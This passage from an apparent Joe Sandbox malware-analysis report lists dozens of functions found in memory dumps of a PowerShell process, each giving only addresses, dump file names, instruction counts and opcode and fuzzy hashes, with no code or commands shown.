                                                                                              • Instruction Fuzzy Hash: 462122B6604340EFCB04DF14D9C0B26BBA6FF84324F248569ED090B202D736E45ACBA2
                                                                                              Function 079365E1 Relevance: .1, Instructions: 71COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519750612.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_7930000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3471d587f56bc3c98c4aee453a31c359ae021ed01171282dd0d58de0cd998da1
                                                                                              • Instruction ID: 7e93877b32c2c4fd221def43d4a8a456595dced32c1c62f83bed5d6eb4892599
                                                                                              • Opcode Fuzzy Hash: 3471d587f56bc3c98c4aee453a31c359ae021ed01171282dd0d58de0cd998da1
                                                                                              • Instruction Fuzzy Hash: 80213AB1A05746DFC7119F3484102BABFFAEF862ACF2440BAC445CB251DB31D951CB91
                                                                                              Function 085EEC50 Relevance: .1, Instructions: 71COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2522895077.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_85e0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cb59ad9028cb4e0e450d0f82925f59799c0f38b4efc7de10f96d161f285da863
                                                                                              • Instruction ID: f5a91ee42a6ac45538398a13fcfece3776448391e041e267e2132e4d2abb14e4
                                                                                              • Opcode Fuzzy Hash: cb59ad9028cb4e0e450d0f82925f59799c0f38b4efc7de10f96d161f285da863
                                                                                              • Instruction Fuzzy Hash: 09313C70E10259DFCB09DFA8E844AEEBBB2FF88301F10916AE505A7350DB345945CFA0
                                                                                              Function 085E04A5 Relevance: .1, Instructions: 70COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2522895077.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_85e0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 26e6e42e8f3a8618340ff8ffec89d6cf416bcec08c9e31e71a90216735db99c0
                                                                                              • Instruction ID: f1f93b833472cbf98eda90b6563fee7cfef63172d982c4a610f0ace888998fe0
                                                                                              • Opcode Fuzzy Hash: 26e6e42e8f3a8618340ff8ffec89d6cf416bcec08c9e31e71a90216735db99c0
                                                                                              • Instruction Fuzzy Hash: DF212F34604609DFD319DF94D990A6EB7B2FB89315F24C45AE506AB3D2CAB2AD03CB50
                                                                                              Function 0AA4B9E0 Relevance: .1, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614600100.000000000AA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa40000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 17e2fb8322d2252cf622a66e2857d78dfbf503eab3de3d17ee3aaa19203baf70
                                                                                              • Instruction ID: 96d579e6c91c4d9a3c2e82e658e0ad85e590503c9e5f72b57696cc9a337264a2
                                                                                              • Opcode Fuzzy Hash: 17e2fb8322d2252cf622a66e2857d78dfbf503eab3de3d17ee3aaa19203baf70
                                                                                              • Instruction Fuzzy Hash: D2212574D05209DBDB18DFEAD5082EEBBB6EB88300F10902AE505B3290E7749A44CFA1
                                                                                              Function 0AA4B9D1 Relevance: .1, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614600100.000000000AA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa40000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 96faa157ba3eb8842bc6bb137832e1bc4532f4d517dbed2dc4ab05ebbd4f9c4a
                                                                                              • Instruction ID: 06a945810ee4e1fa786566e776aa141cb86d59a4e760e318f6af13f812c6a105
                                                                                              • Opcode Fuzzy Hash: 96faa157ba3eb8842bc6bb137832e1bc4532f4d517dbed2dc4ab05ebbd4f9c4a
                                                                                              • Instruction Fuzzy Hash: B1212470E01209DFDB18DFA9D5482EEBBB6EB88300F10947AE405A3291E7744A54CFA1
                                                                                              Function 078A5C28 Relevance: .1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2519178972.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_78a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 14bf2a22fbdf27e30c62418f744c872938cc34c8529f0af62299f50bc5e7dcae
                                                                                              • Instruction ID: 1d650d1ff862363548a7bc16525e46522ac63b3f98c59b56b516509182271693
                                                                                              • Opcode Fuzzy Hash: 14bf2a22fbdf27e30c62418f744c872938cc34c8529f0af62299f50bc5e7dcae
                                                                                              • Instruction Fuzzy Hash: 551193F0A0020AEFEB50DF6AC44877ABBF5AFA4264F148066D815CB254EB31D9D1C761
                                                                                              Function 0AA44A88 Relevance: .1, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614600100.000000000AA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa40000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5220110036b002805b1760c0356b34a63e790f24c7f285996a16bac5f48d62f8
                                                                                              • Instruction ID: ec97a5135e73772d74f9cff4c13e015e5f66e5fb97fb169bfe11003017b57c97
                                                                                              • Opcode Fuzzy Hash: 5220110036b002805b1760c0356b34a63e790f24c7f285996a16bac5f48d62f8
                                                                                              • Instruction Fuzzy Hash: CF2147B0E0425ADFCF04CFA9D8456EEBBB6FB8C300F04842AE514B3291D7745A95CBA4
                                                                                              Function 085EF7C8 Relevance: .1, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2522895077.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_85e0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c210daac3460adaeb98cf364110da5296d01ce67336c7cb299e333156462b993
                                                                                              • Instruction ID: de86d0cb11175e8d86fca656808ca322229896475adef9dc803f34f2a7891ec2
                                                                                              • Opcode Fuzzy Hash: c210daac3460adaeb98cf364110da5296d01ce67336c7cb299e333156462b993
                                                                                              • Instruction Fuzzy Hash: 022115719003499FDB10DFAAC944ADEFBF5FF88320F14842AE519A7210CB759954CFA5
                                                                                              Function 0AA44A98 Relevance: .1, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614600100.000000000AA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa40000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5552a233cfe82dfb0a3c4abae18e581253f4821f431e5ce3bc5c28c170376875
                                                                                              • Instruction ID: 376a11210b7b80fd2c7ca2f29b05989e7f52f7a36e61b5588ebb259c60026c0f
                                                                                              • Opcode Fuzzy Hash: 5552a233cfe82dfb0a3c4abae18e581253f4821f431e5ce3bc5c28c170376875
                                                                                              • Instruction Fuzzy Hash: CA1126B4E0421ADFCB44CF99D4456EEBBB6FB8C310F008026E514A3280D7745A85CBA4
                                                                                              Function 04E7DF5A Relevance: .1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2472618466.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_4e70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2f2b1e6276a9ec242d9ff723a3cff919073d784f8becf5f12e10faa44a3eabaa
                                                                                              • Instruction ID: b47d48dd8ce95179e2742bd1548bbac1091dea03fc47998cbda5c6d64fe95393
                                                                                              • Opcode Fuzzy Hash: 2f2b1e6276a9ec242d9ff723a3cff919073d784f8becf5f12e10faa44a3eabaa
                                                                                              • Instruction Fuzzy Hash: 7011E7B4A00209DFCB04DF98C9809AEBBB5FF48310B108559E909AB351D731FC41CBA1
                                                                                              Function 04D7D0DF Relevance: .1, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2472151517.0000000004D7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D7D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_4d7d000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 87de10424c5bfac4a68ffb830550d4e3d4f2d232aa8a80d6bf4e14881253d009
                                                                                              • Instruction ID: b9044d92bfc6f87f0a8e617c25b142a577b282f477ae656002bc74c8148fc724
                                                                                              • Opcode Fuzzy Hash: 87de10424c5bfac4a68ffb830550d4e3d4f2d232aa8a80d6bf4e14881253d009
                                                                                              • Instruction Fuzzy Hash: 8F118176504284DFCB15CF10D9C4B16BFB2FB84314F28C5A9DC494B656C33AE45ACBA2
                                                                                              Function 04E7D232 Relevance: .0, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2472618466.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_4e70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 00353b3f91e210bb27738a38af15e5264fc1767c8593441bc02c65434caf3951
                                                                                              • Instruction ID: 51e701f0d03d0fd67ffd0b3f2dae10e009b3da30459cedbd1b5e16e96374c323
                                                                                              • Opcode Fuzzy Hash: 00353b3f91e210bb27738a38af15e5264fc1767c8593441bc02c65434caf3951
                                                                                              • Instruction Fuzzy Hash: BC11EC74A00149EFDB45CBA8D884E9DBBF1AF88314F24C159E504AB351C775ED82CB90
                                                                                              Function 085E8093 Relevance: .0, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2522895077.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_85e0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 75ad4e31965b735a486955c429dbbaca65a0c073ffd765d26590f85e2db1b08f
                                                                                              • Instruction ID: f74fc0e1ee43ab17ee5e000b7dfc5971817e63cd518ce77fc90c02fc7ebdd9b7
                                                                                              • Opcode Fuzzy Hash: 75ad4e31965b735a486955c429dbbaca65a0c073ffd765d26590f85e2db1b08f
                                                                                              • Instruction Fuzzy Hash: 892139B49012A98FDB64DF24ED9DB9DBBB1BB48301F1041EAE44EA2260DB741E80CF54
                                                                                              Function 085E7490 Relevance: .0, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2522895077.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_85e0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aa41e364b668e3ed1a3214140238f4ce01043413c2313152d4c1b77e014c9338
                                                                                              • Instruction ID: e6444203ffc7f4b455d5f60ec75a7be4720c38ac1a782c285b10a2b5d06f9ccf
                                                                                              • Opcode Fuzzy Hash: aa41e364b668e3ed1a3214140238f4ce01043413c2313152d4c1b77e014c9338
                                                                                              • Instruction Fuzzy Hash: 3121F6B8D15268CFCB249F34DD9879CBBB0BB49316F4016DAE90DA6242D7744E84CF68
                                                                                              Function 04D6D01D Relevance: .0, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2472057587.0000000004D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D6D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_4d6d000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 339df876f362d50c3447db5afde82f26b4bdf09700ea04326b21c8335a9dfda0
                                                                                              • Instruction ID: 5d5a9165f779e89cfa976f17d05f8e3a76ceb615d5ed0c1853fb22c8a17d84d5
                                                                                              • Opcode Fuzzy Hash: 339df876f362d50c3447db5afde82f26b4bdf09700ea04326b21c8335a9dfda0
                                                                                              • Instruction Fuzzy Hash: 61012671704340EBEB204E25FD84B67BF98EF81324F18C01AED4A4F242CAB8E841C6B1
                                                                                              Function 04D6D005 Relevance: .0, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2472057587.0000000004D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D6D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_4d6d000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4dfd8e95dc1ea7b9ade865796c6f839815d60b5f038e001ae6439e47a57cce18
                                                                                              • Instruction ID: 4e37b01c5afcbbea2ee6841975d133c43bc6c420f1344aa19593877f59b03e21
                                                                                              • Opcode Fuzzy Hash: 4dfd8e95dc1ea7b9ade865796c6f839815d60b5f038e001ae6439e47a57cce18
                                                                                              • Instruction Fuzzy Hash: 2D015E6250E3C09FE7128B259994B52BFB4EF43224F19C1DBD9888F1A3C2695849C772
                                                                                              Function 085EF6A8 Relevance: .0, Instructions: 42COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2522895077.00000000085E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 085E0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_85e0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6b6c4b6853b16d7270f2f83b4e85032eedb1d7cb307c619900bd2b6cae53ec0c
                                                                                              • Instruction ID: f17e23ba5c498f4b84114e4b9830c5b53a2996cec1c874585aad2b6b678eca12
                                                                                              • Opcode Fuzzy Hash: 6b6c4b6853b16d7270f2f83b4e85032eedb1d7cb307c619900bd2b6cae53ec0c
                                                                                              • Instruction Fuzzy Hash: 3E01C275A00209EFCB14CF9AC884D9EBBF5FF4C320F148169F919AB360DA319840CB54
                                                                                              Function 04E7AC4F Relevance: .0, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2472618466.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_4e70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 81487df7d761770f4c9b1a474dfd9ff8bd6c15411cd24b8dfecd72d169821c1c
                                                                                              • Instruction ID: 62fa321f23113752448ae587122f162ebdf84a39f331cc7afbfada39379361de
                                                                                              • Opcode Fuzzy Hash: 81487df7d761770f4c9b1a474dfd9ff8bd6c15411cd24b8dfecd72d169821c1c
                                                                                              • Instruction Fuzzy Hash: 05013C746001049FD704DFACD994AAEFBB5FF88314B2081A9E94997351CB36EC53CB91
                                                                                              Function 0AA604F8 Relevance: .0, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614874909.000000000AA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA60000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa60000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2631cdf4689ff42a645d9ba1b1c88d039bc8096950e4882dad4b5db6c7c894db
                                                                                              • Instruction ID: 907938ee4af3789a4490ed6365815238a88a446e24b641530e37cd5ea08527b5
                                                                                              • Opcode Fuzzy Hash: 2631cdf4689ff42a645d9ba1b1c88d039bc8096950e4882dad4b5db6c7c894db
                                                                                              • Instruction Fuzzy Hash: 55F03430D09248EFCB54CFA8D8916ACBBF0EF49300F15C1EAC848A3351D631AA42CF40
                                                                                              Function 04E72C06 Relevance: .0, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2472618466.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_4e70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 59ca108e8b0aeeeb3b504482cb59a407f88df7ec8237dc47f91cff5c03b00998
                                                                                              • Instruction ID: b235134dab254e079bf10ee13c29a4fa29365519522431ef2ca735d3420991a2
                                                                                              • Opcode Fuzzy Hash: 59ca108e8b0aeeeb3b504482cb59a407f88df7ec8237dc47f91cff5c03b00998
                                                                                              • Instruction Fuzzy Hash: 7BF0DA35A00105DFCB15CF9DD990AEEF7B1FF88324F208199E515A72A1C732AD52CB50
                                                                                              Function 0AA4BF2A Relevance: .0, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614600100.000000000AA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa40000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e2c8414c199f01c06d9cc7d6030a81ed8a39c562d9000079ec526ce1469688e7
                                                                                              • Instruction ID: 1b08f53c29e5f6bc992462bee9f8cee7e6278049271d7028770c15fce980a3b3
                                                                                              • Opcode Fuzzy Hash: e2c8414c199f01c06d9cc7d6030a81ed8a39c562d9000079ec526ce1469688e7
                                                                                              • Instruction Fuzzy Hash: F0F0F474E49718CFDB24DB65C8486E9BBBAFB8D301F0180A5A80DDB295D734D991CF20
                                                                                              Function 0AA44868 Relevance: .0, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614600100.000000000AA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa40000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 42883da2d208a870452cc3aec00e36ae445c471af52e6a437224ac9254f023f7
                                                                                              • Instruction ID: 8551f6e0d6135b2b14eef2d0714e59e5af141080ce2e6228699bbd09169bc979
                                                                                              • Opcode Fuzzy Hash: 42883da2d208a870452cc3aec00e36ae445c471af52e6a437224ac9254f023f7
                                                                                              • Instruction Fuzzy Hash: 8FF0D474A04248AFCB44DF98D545AACFBF5FB48300F10C1AAA82897351D6359A55DF81
                                                                                              Function 0AA48C69 Relevance: .0, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614600100.000000000AA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa40000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ab91c1bfc418a3f0065aa1aa946ea8ae321a66fcc96b9705704bd72b80185310
                                                                                              • Instruction ID: 667d79eb66ba7915e3d2b13d2ea76d536c9cec84346fee2338dc78de768fac01
                                                                                              • Opcode Fuzzy Hash: ab91c1bfc418a3f0065aa1aa946ea8ae321a66fcc96b9705704bd72b80185310
                                                                                              • Instruction Fuzzy Hash: 05F05875E09248AFCB41CFA8D84069CBFF1EB89300F1081EAA81893352C2398A41DF41
                                                                                              Function 0AA60EFB Relevance: .0, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614874909.000000000AA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA60000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa60000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9e371a5c3ad03ae722d0691c8e522f934650041ea63689e9cec912e429a70aa9
                                                                                              • Instruction ID: e58592970e952c612afa5f1db172a1f378f8ca62af5e399d8a78a75396b4360e
                                                                                              • Opcode Fuzzy Hash: 9e371a5c3ad03ae722d0691c8e522f934650041ea63689e9cec912e429a70aa9
                                                                                              • Instruction Fuzzy Hash: ECF01534904208FFCB04CF98D840AACBBB5FB48300F10C1A9EC1863351C732AA61EF80
                                                                                              Function 0AA4BB40 Relevance: .0, Instructions: 24COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614600100.000000000AA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa40000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c0aa932f9abea4041830f3346d0554f2811eb6455eb619fc63e91b88588ac870
                                                                                              • Instruction ID: 983317b55b43bb27b35183b9319bbfcff9b783c819f3278cb6b4eb7ced2d1223
                                                                                              • Opcode Fuzzy Hash: c0aa932f9abea4041830f3346d0554f2811eb6455eb619fc63e91b88588ac870
                                                                                              • Instruction Fuzzy Hash: E5F06D30909248EFCF04DFA4D851AECBF71EB86300F1482D9E84457356C6329E56DB96
                                                                                              Function 0AA44870 Relevance: .0, Instructions: 24COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614600100.000000000AA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa40000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 347d419112bedd63ac8c67b72b840b39f5b73a880fe7758968f98e420ce1c7b4
                                                                                              • Instruction ID: 35e89affb4c7045f282df3d7c5237554c0643e35daa63a89f33b5d124257a94f
                                                                                              • Opcode Fuzzy Hash: 347d419112bedd63ac8c67b72b840b39f5b73a880fe7758968f98e420ce1c7b4
                                                                                              • Instruction Fuzzy Hash: BDF0A574D04248EFCB84DFA8D945AADFBF5EB88300F10C1AAAD2893351D6359A51DF80
                                                                                              Function 0AA6062B Relevance: .0, Instructions: 24COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614874909.000000000AA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA60000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa60000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3ce86281a439e18436b2d0cb1e60f681c8092f30d65edf14331cfff9aa0c407d
                                                                                              • Instruction ID: 205947a493e597b62442375d1e9a9a4ce5a7e0c845160abcdf819f59ba09a299
                                                                                              • Opcode Fuzzy Hash: 3ce86281a439e18436b2d0cb1e60f681c8092f30d65edf14331cfff9aa0c407d
                                                                                              • Instruction Fuzzy Hash: 44E06D34A09285DFCB09CFA0D998AA9BFB0EF46310F14C1EED80497352D6755A92DB50
                                                                                              Function 0AA48C78 Relevance: .0, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614600100.000000000AA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa40000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4dd432a23d39301ede3fec2c0c1c6cc7638208e2d120b9c117f47d6fb6129cc0
                                                                                              • Instruction ID: 2c0fefaa6cfc1d07005caebb5430e57fa7c67c4513181634b0f375bc77e4260f
                                                                                              • Opcode Fuzzy Hash: 4dd432a23d39301ede3fec2c0c1c6cc7638208e2d120b9c117f47d6fb6129cc0
                                                                                              • Instruction Fuzzy Hash: 91E0C975D05208EFCB54DFA8D945A9DBBF5EB88300F10C1A9A91893341D6399A51DF80
                                                                                              Function 0AA4F568 Relevance: .0, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614600100.000000000AA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa40000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: da7d5b9fe9c08d8dee40b16c6f320d7e72c7c092bc4cbb36000e5961805585ac
                                                                                              • Instruction ID: 8dcc69bf0b5f389bd6f27ffcecf447cc067915587df3228c944a011ef85be3fc
                                                                                              • Opcode Fuzzy Hash: da7d5b9fe9c08d8dee40b16c6f320d7e72c7c092bc4cbb36000e5961805585ac
                                                                                              • Instruction Fuzzy Hash: E5E0E574D08248AFCB44DFA9D5456ACBBF4EB89200F14C1EAA818D3381D6359A51DF81
                                                                                              Function 0AA60508 Relevance: .0, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2614874909.000000000AA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AA60000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_aa60000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8e23557a4a4fc0d20baba5bda31cb9f99a83c82a33231204181c3c2aac50a54f
                                                                                              • Instruction ID: 22b99aa54a7224f999cd30dfbe0242cecc7b1c13978a4eabe78ed5c0e680ccaa
                                                                                              • Opcode Fuzzy Hash: 8e23557a4a4fc0d20baba5bda31cb9f99a83c82a33231204181c3c2aac50a54f
                                                                                              • Instruction Fuzzy Hash: 9BE07574E05208EFCB54DFA8D5456ADBBF5EF48304F14C1A9D81893341E675AA42DF81
                                                                                              Function 0AA4B998 Relevance: .0, Instructions: 21COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
